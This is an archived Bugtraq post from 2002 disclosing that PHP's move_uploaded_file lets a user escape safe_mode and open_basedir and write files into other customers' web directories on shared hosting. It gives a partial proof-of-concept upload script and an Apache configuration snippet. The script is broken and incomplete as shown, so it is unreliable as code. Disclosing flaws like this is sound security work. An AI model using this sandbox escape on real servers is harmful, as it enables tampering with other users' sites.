Home page logo

bugtraq logo Bugtraq mailing list archives

move_uploaded_file breaks safe_mode restrictions in PHP
From: "Tozz" <tozz () embrace selwerd nl>
Date: Sun, 17 Mar 2002 23:23:34 +0100


Its possible to circumvent (probadly spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.

You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )


$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

echo "The file <tt>$file</tt> was sucessfully
} else {
echo "Sorry, your file exceeds the size limit of $size_limit

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>

As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.

Virtualhost configuration snippet:

<VirtualHost IP_HERE>
        DocumentRoot /domains/whatever.com/public_html/root/
        ServerName root.whatever.com
        CustomLog /domains/whatever.com/logs/access_log combined
        ErrorLog /domains/whatever.com/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/whatever.com/public_html/root/

As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.

PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]